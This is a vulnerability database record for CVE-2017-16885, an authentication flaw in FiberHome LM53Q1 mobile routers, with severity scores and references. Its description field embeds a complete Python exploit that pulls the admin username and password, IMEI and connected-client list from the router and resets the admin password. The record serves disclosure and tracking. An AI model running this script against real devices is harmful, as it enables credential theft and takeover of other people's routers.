    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201801-0580",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "lm53q1",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "fiberhome",
        "version": "vh519r05c01s38"
      },
      {
        "model": "lm53q1",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "fiberhome group",
        "version": "vh519r05c01s38"
      },
      {
        "model": "lm53q1 vh519r05c01s38",
        "scope": null,
        "trust": 0.6,
        "vendor": "fiberhome",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-04063"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-012101"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201711-806"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-16885"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:fiberhomegroup:lm53q1_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-012101"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ibad Shah",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "145737"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2017-16885",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2017-16885",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2018-04063",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-107852",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2017-16885",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2017-16885",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2017-16885",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-04063",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201711-806",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-107852",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-16885",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-04063"
      },
      {
        "db": "VULHUB",
        "id": "VHN-107852"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-16885"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-012101"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201711-806"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-16885"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The information includes Version of device, Firmware ID, Connected users to device along their MAC Addresses, etc. FiberHome mobile WIFI Device model LM53Q1 Contains a permission vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The FiberHomeLM53Q1 is a portable router device from China FiberHome. There is an information disclosure vulnerability in the Portal in the FiberHomeLM53Q1VH519R05C01S38 version, which is caused by the program not processing the correct permissions. #!/usr/bin/python\n\n#   /$$$$$$$$ /$$ /$$                           /$$   /$$                                         /$$$$$$$                                      /$$                     /$$$$$$$$                     /$$           /$$   /$$\n#  | $$_____/|__/| $$                          | $$  | $$                                        | $$__  $$                                    | $$                    | $$_____/                    | $$          |__/  | $$\n#  | $$       /$$| $$$$$$$   /$$$$$$   /$$$$$$ | $$  | $$  /$$$$$$  /$$$$$$/$$$$   /$$$$$$       | $$  \\ $$  /$$$$$$  /$$$$$$/$$$$   /$$$$$$  /$$$$$$    /$$$$$$       | $$       /$$   /$$  /$$$$$$ | $$  /$$$$$$  /$$ /$$$$$$\n#  | $$$$$   | $$| $$__  $$ /$$__  $$ /$$__  $$| $$$$$$$$ /$$__  $$| $$_  $$_  $$ /$$__  $$      | $$$$$$$/ /$$__  $$| $$_  $$_  $$ /$$__  $$|_  $$_/   /$$__  $$      | $$$$$   |  $$ /$$/ /$$__  $$| $$ /$$__  $$| $$|_  $$_/\n#  | $$__/   | $$| $$  \\ $$| $$$$$$$$| $$  \\__/| $$__  $$| $$  \\ $$| $$ \\ $$ \\ $$| $$$$$$$$      | $$__  $$| $$$$$$$$| $$ \\ $$ \\ $$| $$  \\ $$  | $$    | $$$$$$$$      | $$__/    \\  $$$$/ | $$  \\ $$| $$| $$  \\ $$| $$  | $$\n#  | $$      | $$| $$  | $$| $$_____/| $$      | $$  | $$| $$  | $$| $$ | $$ | $$| $$_____/      | $$  \\ $$| $$_____/| $$ | $$ | $$| $$  | $$  | $$ /$$| $$_____/      | $$        \u003e$$  $$ | $$  | $$| $$| $$  | $$| $$  | $$ /$$\n#  | $$      | $$| $$$$$$$/|  $$$$$$$| $$      | $$  | $$|  $$$$$$/| $$ | $$ | $$|  $$$$$$$      | $$  | $$|  $$$$$$$| $$ | $$ | $$|  $$$$$$/  |  $$$$/|  $$$$$$$      | $$$$$$$$ /$$/\\  $$| $$$$$$$/| $$|  $$$$$$/| $$  |  $$$$/\n#  |__/      |__/|_______/  \\_______/|__/      |__/  |__/ \\______/ |__/ |__/ |__/ \\_______/      |__/  |__/ \\_______/|__/ |__/ |__/ \\______/    \\___/   \\_______/      |________/|__/  \\__/| $$____/ |__/ \\______/ |__/   \\___/\n#                                                                                                                                                                                          | $$\n#                                                                                                                                                                                          | $$\n#                                                                                                                                                                                          |__/\n# Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities\n# Exploit Author: Ibad Shah\n# Vendor Homepage: www.fiberhome.com\n# Version: VH519R05C01S38\n# Tested on: Linux\n# Platform : Hardware\n# CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887\n# Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC\n\nimport requests,sys,getopt,socket,struct\n\n#Declaring IP as our global variable to probe for Gateway IP of Device\nglobal ip\n\n#Getting Gateway IP Address\ndef get_default_gateway_linux():\n    with open(\"/proc/net/route\") as fh:\n        for line in fh:\n            fields = line.strip().split()\n            if fields[1] != \u002700000000\u0027 or not int(fields[3], 16) \u0026 2:\n                continue\n            return socket.inet_ntoa(struct.pack(\"\u003cL\", int(fields[2], 16)))\n\treturn;\n\n\nip = get_default_gateway_linux()\n\nexploit_title =  \"=============================================== \\n FiberHome Remote Administrator Account Details \\n================================================\";\n\n\n#Function to get Device Statistics \ndef get_device_details():\n\n\tgateway = None\n\thardware = None\n\tdevice_name = None\n\tdevices_all = \u0027\u0027\n\tversion = None\n\tgateway = None\n\tssid = \u0027\u0027\n\tdns1 = None\n\tdns2 = None\n\n\n\trequestStatus = requests.get(\"http://192.168.8.1/xml_action.cgi?method=get\u0026module=duster\u0026file=status1\")\n\tapi_response = requestStatus.content.replace(\u0027\\t\u0027,\u0027\u0027).split(\u0027\\n\u0027)\n\tfor results in api_response:\n        \tif \"\u003chardware_version\u003e\" in results:\n                \thardware = results.replace(\u0027\u003chardware_version\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/hardware_version\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n        \tif \"\u003cdevice_name\u003e\" in results:\n                \tdevice_name = results.replace(\u0027\u003cdevice_name\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/device_name\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n        \tif \"\u003cversion_num\u003e\" in results:\n                \tversion = results.replace(\u0027\u003cversion_num\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/version_num\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n        \tif \"\u003cgateway\u003e\" in results:\n                \tgateway = results.replace(\u0027\u003cgateway\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/gateway\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n        \tif \"\u003cssid\u003e\" in results:\n                \tssid = results.replace(\u0027\u003cssid\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/ssid\u003e\u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n        \tif \"\u003cdns1\u003e\" in results:\n                \tdns1 = results.replace(\u0027\u003cdns1\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/dns1\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n        \tif \"\u003cdns2\u003e\" in results:\n                \tdns2 = results.replace(\u0027\u003cdns2\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/dns2\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n        \tif \"\u003cIMEI\u003e\" in results:\n                \timei = results.replace(\u0027\u003cIMEI\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/IMEI\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n                \tprint \"\\n==============================================\"\n\n                \tprint \"\\nHardware Version of Device : \"+hardware+\"\\n\"\n                \tprint \"\\nName of Device : \"+device_name+\"\\n\"\n               \t\tprint \"\\nSoftware Version of Device : \"+version+\"\\n\"\n               \t\tprint \"\\nIMEI of Device! : \"+imei+\"\\n\"\n              \t\tprint \"\\nWiFi SSID of Device : \"+ssid+\"\\n\"\n\t                print \"\\nGateway of Zong Device : \"+gateway+\"\\n\"\n              \t\tprint \"\\nDNS Primary of Device : \"+dns1+\"\\n\"\n\t\t        print \"\\nDNS Secondary of Device : \"+dns2+\"\\n\"\n\t                print \"\\n=============================================================================\\n\";\n\t        if \"\u003cknown_devices_list\u003e\" in results:\n               \t\tdevices_all = results.replace(\u0027\u003cknown_devices_list\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/known_devices_list\u003e\u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n               \t\tprint \"\\nConnected Devices to WIFI\\n\"\n               \t\tprint devices_all\n\n\n#Function for getting User Account Details to login to Portal\ndef get_user_account_details():\n\trequest = requests.get(\"http://\"+ip+\"/xml_action.cgi?method=get\u0026module=duster\u0026file=admin\")\n\tadmin_details = request.content.replace(\u0027\\t\u0027,\u0027\u0027).split(\u0027\\n\u0027)\n\tfor admin_login_response in admin_details:\n        \tif \"\u003crouter_username\u003e\" in admin_login_response:\n                \tusername = admin_login_response.replace(\u0027\u003crouter_username\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/router_username\u003e\u0027,\u0027\u0027)\n        \tif \"\u003crouter_password\u003e\" in admin_login_response:\n                \tpassword = admin_login_response.replace(\u0027\u003crouter_password\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/router_password\u003e\u0027,\u0027\u0027)\n                \tprint \"\\nUsername of Device Web Application :\\n\"+username+\" \"\n                \tprint \"Password of Device Web Application :\\n\"+password+\"\\n\"\n                \tprint \"\\n=============================================================================\\n\";\n\n\n#Function to change Administrator Password \n\ndef change_admin_password():\n\tset_password = raw_input(\"\\nEnter Password to Change : \")\n\tpassword = str(set_password)\n\txml = \"\u003c?xml version=\u00271.0\u0027 encoding=\u0027UTF-8\u0027?\u003e\u003cRGW\u003e\u003cmanagement\u003e\u003crouter_password\u003e\"+password+\"\u003c/router_password\u003e\u003c/management\u003e\u003c/RGW\u003e\"\n\theaders = {\u0027Content-Type\u0027: \u0027application/xml\u0027} \n\tchange_password_request = requests.post(\"http://\"+ip+\"/xml_action.cgi?method=set\u0026module=duster\u0026file=admin\", data=xml, headers=headers).text\n\tprint \"Password Changed!\"\n\n\ndef main():\n\n\tprint exploit_title\n\tprint \"\\nSelect Menu For Fetching Details \\n \\n 1. Get Portal Login \u0026 Password. \\n 2. Get Other Details. \\n 3. Change Admin Password for Device\"\n\n\tget_option = raw_input(\"\\n Enter Option :  \");\n\n\toption = int(get_option)\n\n\tif get_option == \"1\":\n\n        \tget_user_account_details()\n\n        \traw_input(\"\\n Press Any Key To Exit\");\n\n\telif get_option == \"2\":\n\n        \tget_device_details()\n\n        \traw_input(\"\\n Press Any Key To Exit\");\n\n\telif get_option == \"3\":\n\n\t\tchange_admin_password()\n\n\telif get_option == \"\":\n\n\t\tprint \"Good Bye!\";\n\n\telse:\n\n\t\tprint \"Goodbye!\";\n\nmain()\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-16885"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-012101"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-04063"
      },
      {
        "db": "VULHUB",
        "id": "VHN-107852"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-16885"
      },
      {
        "db": "PACKETSTORM",
        "id": "145737"
      }
    ],
    "trust": 2.43
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-107852",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=43460",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-107852"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-16885"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-16885",
        "trust": 3.3
      },
      {
        "db": "EXPLOIT-DB",
        "id": "43460",
        "trust": 2.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-012101",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-04063",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201711-806",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "145737",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-107852",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-16885",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-04063"
      },
      {
        "db": "VULHUB",
        "id": "VHN-107852"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-16885"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-012101"
      },
      {
        "db": "PACKETSTORM",
        "id": "145737"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201711-806"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-16885"
      }
    ]
  },
  "id": "VAR-201801-0580",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-04063"
      },
      {
        "db": "VULHUB",
        "id": "VHN-107852"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-04063"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:09:15.157000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://hk.fiberhomegroup.com/en/index.html"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/infa-aksharma/Risklogyx "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-16885"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-012101"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-732",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-275",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-107852"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-012101"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-16885"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.2,
        "url": "http://seclists.org/fulldisclosure/2018/jan/28"
      },
      {
        "trust": 2.5,
        "url": "https://www.exploit-db.com/exploits/43460/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16885"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16885"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/732.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/infa-aksharma/risklogyx"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16887"
      },
      {
        "trust": 0.1,
        "url": "https://www.fiberhome.com"
      },
      {
        "trust": 0.1,
        "url": "http://\"+ip+\"/xml_action.cgi?method=set\u0026module=duster\u0026file=admin\","
      },
      {
        "trust": 0.1,
        "url": "http://192.168.8.1/xml_action.cgi?method=get\u0026module=duster\u0026file=status1\")"
      },
      {
        "trust": 0.1,
        "url": "http://\"+ip+\"/xml_action.cgi?method=get\u0026module=duster\u0026file=admin\")"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16886"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-04063"
      },
      {
        "db": "VULHUB",
        "id": "VHN-107852"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-16885"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-012101"
      },
      {
        "db": "PACKETSTORM",
        "id": "145737"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201711-806"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-16885"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-04063"
      },
      {
        "db": "VULHUB",
        "id": "VHN-107852"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-16885"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-012101"
      },
      {
        "db": "PACKETSTORM",
        "id": "145737"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201711-806"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-16885"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-03-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-04063"
      },
      {
        "date": "2018-01-12T00:00:00",
        "db": "VULHUB",
        "id": "VHN-107852"
      },
      {
        "date": "2018-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-16885"
      },
      {
        "date": "2018-02-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-012101"
      },
      {
        "date": "2018-01-07T14:44:44",
        "db": "PACKETSTORM",
        "id": "145737"
      },
      {
        "date": "2017-11-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201711-806"
      },
      {
        "date": "2018-01-12T17:29:00.897000",
        "db": "NVD",
        "id": "CVE-2017-16885"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-03-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-04063"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-107852"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-16885"
      },
      {
        "date": "2018-02-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-012101"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201711-806"
      },
      {
        "date": "2024-11-21T03:17:10.670000",
        "db": "NVD",
        "id": "CVE-2017-16885"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201711-806"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "FiberHome mobile  WIFI Device model  LM53Q1 Permissions vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-012101"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "lack of information",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201711-806"
      }
    ],
    "trust": 0.6
  }
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2017-16885 (GCVE-0-2017-16885)

CNVD-2018-04063

FKIE_CVE-2017-16885

GHSA-8M73-PC64-X44P

GSD-2017-16885

VAR-201801-0580

/$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$

| $$_/|/| $$ | $$ | $$ | $$ $$ | $$ | $$_____/ | $$ |/ | $$

| $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$

| $$$$$ | $$| $$ $$ /$$ $$ /$$ $$| $$$$$$$$ /$$ $$| $$ $$ $$ /$$ $$ | $$$$$$$/ /$$ $$| $$ $$ $$ /$$ $$| $$/ /$$ $$ | $$$$$ | $$ /$$/ /$$ $$| $$ /$$ $$| $$| $$/

| $$/ | $$| $$ \ $$| $$$$$$$$| $$ __/| $$ $$| $$ \ $$| $$ \ $$ \ $$| $$$$$$$$ | $$ $$| $$$$$$$$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$$$$$$$ | $$/ \ $$$$/ | $$ \ $$| $$| $$ \ $$| $$ | $$

